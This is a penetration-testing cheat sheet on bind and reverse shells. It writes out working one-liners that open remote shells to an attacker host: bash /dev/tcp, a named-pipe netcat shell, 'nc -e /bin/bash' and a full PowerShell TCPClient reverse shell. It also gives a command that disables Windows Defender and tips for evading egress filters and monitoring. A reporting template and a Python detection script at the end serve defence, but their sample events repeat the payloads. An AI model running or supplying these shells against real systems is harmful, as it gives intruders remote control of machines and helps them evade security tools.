🛡️ Methodology Checklist
- Determine connectivity: can target reach attacker outbound? → reverse shell
- Egress blocked or NAT? → bind shell on target
- Reverse TCP one-liner (Linux): `bash -c 'bash -i >& /dev/tcp/[LHOST]/[LPORT] 0>&1'`
- Netcat listener on attacker: `nc -lvp [LPORT]`
- Bind shell (nc on target): `nc -lvp [LPORT] -e /bin/bash`
- Connect to bind shell: `nc [TARGET] [LPORT]`
- Verify shell is working before proceeding
🎯 Operational Context
Use when: Deciding shell direction → reverse shell when outbound is open (most engagements); bind shell when attack box has no inbound connectivity.
Think Dumber First: Always try reverse shell first. If your netcat listener gets a connection but no shell content → try `-e /bin/bash` vs `-c /bin/bash` vs `/bin/sh` syntax differences. Bind shell requires target to listen → check if firewall permits inbound to target.
Skip when: N/A; fundamental concept reference.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| `nc -lvnp 7777` | Start netcat listener (bind shell, victim side) |
| `nc -nv [TARGET_IP] 7777` | Connect to bind shell (attacker side) |
| `rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f \| /bin/bash -i 2>&1 \| nc -lvnp 7777 > /tmp/f` | Full Linux bind shell (victim runs) |
| `sudo nc -lvnp 443` | Reverse shell listener (attacker); use 443 to bypass egress filters |
| `rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f \| /bin/bash -i 2>&1 \| nc [LHOST] 7777 > /tmp/f` | Linux reverse shell one-liner (victim runs; `[LHOST]` is the attacker listener) |
| `powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('[LHOST]',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535\|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 \| Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"` | Windows PowerShell reverse shell one-liner (victim runs; `[LHOST]` is the attacker listener) |
| `Set-MpPreference -DisableRealtimeMonitoring $true` | Disable Windows Defender real-time scan (lab only) |
🔬 Deep Dive & Workflow
Bind Shell vs Reverse Shell
| | Bind Shell | Reverse Shell |
|---|---|---|
| Who listens | Victim | Attacker |
| Direction | Attacker → Victim | Victim → Attacker |
| Firewall issue | Inbound blocked on victim | Outbound rarely blocked |
| NAT issue | Yes (victim behind NAT = unreachable) | No (attacker has public IP) |
| Best use | Internal lab, no firewall | All enterprise environments |
How the Linux Named Pipe Payload Works
`rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc [IP] [PORT] > /tmp/f`
- `rm -f /tmp/f` → clean up any old pipe
- `mkfifo /tmp/f` → create named FIFO pipe (the data buffer that carries nc's output back to bash's input)
- `cat /tmp/f |` → read commands from the pipe
- `/bin/bash -i 2>&1 |` → execute commands in interactive bash, merge stderr into stdout
- `nc [IP] [PORT] > /tmp/f` → send output to attacker; receive input back into pipe
This closes the loop: attacker types → nc → pipe → bash → output → nc → attacker.
PowerShell Reverse Shell: Context Matters
- In CMD (`C:\>` prompt): keep the `powershell -nop -c` prefix
- In PowerShell (`PS C:\>` prompt): start directly with `$client = New-Object...`
Port Selection Strategy
| Port | Reason |
|---|---|
| 443 | Mimics HTTPS; almost never blocked outbound |
| 80 | Mimics HTTP |
| 53 | DNS; rarely filtered |
| 4444 | Metasploit default; avoid in real engagements, actively monitored |
Bind Shell Troubleshooting
- "Connection refused" → listener not started yet, or firewall blocking port
- "Bind: Address already in use" → kill old nc process or change port
- Bind to `0.0.0.0` (all interfaces), not a specific IP; interface binding can fail
Shell Dies on Disconnect
Once you disconnect from a netcat shell, it typically dies. Immediately upgrade to a stable shell or establish persistence after catching the connection.
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| nc reverse shell connects but no output | nc version doesn't support -e | Use: `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\|/bin/sh -i 2>&1\|nc [LHOST] [LPORT] >/tmp/f` |
| Bind shell port filtered by firewall | Inbound blocked to target | Switch to reverse shell; or bind on common port (80, 443) if available |
| Shell dies after 60 seconds | Connection timeout | Upgrade to PTY: python3 -c 'import pty; pty.spawn("/bin/bash")'; background Ctrl+Z, stty raw -echo, fg |
| Windows bind shell nc.exe not present | No nc on target | Use PowerShell: $listener = [System.Net.Sockets.TcpListener]::new([System.Net.IPAddress]::Any,[PORT]); $listener.Start() |
| Reverse shell one-liner fails in web RCE | Shell metachar conflict | URL-encode the payload; use bash -c '{cmd}' to wrap; avoid quotes in web context |
📋 Reporting Trigger
Finding Title: Reverse Shell Achieved via Remote Code Execution
Impact: Interactive shell access provides full command execution context on the target system, enabling enumeration, credential harvesting, and pivot setup as the compromised service account.
Root Cause: Remote code execution vulnerability allows attacker-controlled command execution. Outbound network filtering does not restrict established shell sessions.
Recommendation: Implement egress filtering to restrict outbound connections from server workloads. Deploy EDR to detect shell spawn patterns (bash/cmd spawned by web processes). Patch RCE vulnerabilities promptly.
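Detection logic for the EDR recommendation above (shells spawned by web processes) and for the /dev/tcp, named-pipe, `nc -e` and PowerShell TCPClient payloads explained in the Deep Dive, as an added example that is not part of the original cheat sheet. The process-event field layout, process names, pids and the 203.0.113.10 address are constructed assumptions for the example, not real telemetry.

```python
import re

# Constructed process-creation events (pids, users and the TEST-NET-3 address
# 203.0.113.10 are made up; the PowerShell one-liner is shortened with "...").
SAMPLE_EVENTS = [
    "pid=4012 user=www-data parent=/usr/sbin/apache2 "
    "cmd=bash -c 'bash -i >& /dev/tcp/203.0.113.10/443 0>&1'",
    "pid=4020 user=www-data parent=/usr/sbin/apache2 "
    "cmd=rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 203.0.113.10 7777 > /tmp/f",
    "pid=4031 user=root parent=/usr/bin/sudo cmd=nc -lvnp 7777 -e /bin/bash",
    "pid=4040 user=www-data parent=/usr/sbin/apache2 cmd=/usr/bin/php /var/www/html/cron.php",
    "pid=4055 user=alice parent=/usr/bin/bash cmd=nc -zv db.internal 5432",
    "pid=4061 user=svc-web parent=C:\\inetpub\\w3wp.exe cmd=powershell -nop -c "
    "\"$client = New-Object System.Net.Sockets.TCPClient('203.0.113.10',443); ... iex $data ...\"",
]

WEB_PARENTS = {"apache2", "httpd", "nginx", "php-fpm", "tomcat", "w3wp.exe"}
SHELLS = {"bash", "sh", "dash", "zsh", "cmd.exe", "powershell", "powershell.exe"}

# One content rule per technique on this page; the parent/child check below is
# the behavioural rule (a web server has no business spawning an interactive shell).
PATTERNS = {
    "bash_dev_tcp": re.compile(r"/dev/tcp/\S+"),
    "fifo_nc_pipe": re.compile(r"mkfifo\s+\S+.*\|\s*nc\b"),
    "nc_exec_flag": re.compile(r"\bnc\b.*\s-[a-z]*[ce]\s+/bin/(ba)?sh\b"),
    "ps_tcpclient_iex": re.compile(r"TCPClient.*\biex\b", re.IGNORECASE),
}
EVENT_RE = re.compile(r"pid=(\d+) user=(\S+) parent=(\S+) cmd=(.*)")


def analyze(line):
    """Return (pid, reasons); an empty reasons list means no rule fired."""
    m = EVENT_RE.match(line)
    if not m:
        return None, ["unparsed_event"]
    pid, _user, parent, cmd = m.groups()
    parent_exe = re.split(r"[\\/]", parent)[-1]          # basename, Linux or Windows
    child_exe = re.split(r"[\\/]", cmd.split()[0])[-1] if cmd.split() else ""
    reasons = []
    if parent_exe in WEB_PARENTS and child_exe in SHELLS:
        reasons.append("shell_spawned_by_web_process")
    reasons += [name for name, rx in PATTERNS.items() if rx.search(cmd)]
    return pid, reasons


def scan(events):
    """Map pid -> reasons for every event that fired at least one rule."""
    results = (analyze(line) for line in events)
    return {pid: reasons for pid, reasons in results if reasons}


if __name__ == "__main__":
    print(scan(SAMPLE_EVENTS))
```

The benign `nc -zv` port check and the PHP cron job are included to show that the rules key on shell-spawn context and payload syntax, not on netcat being present.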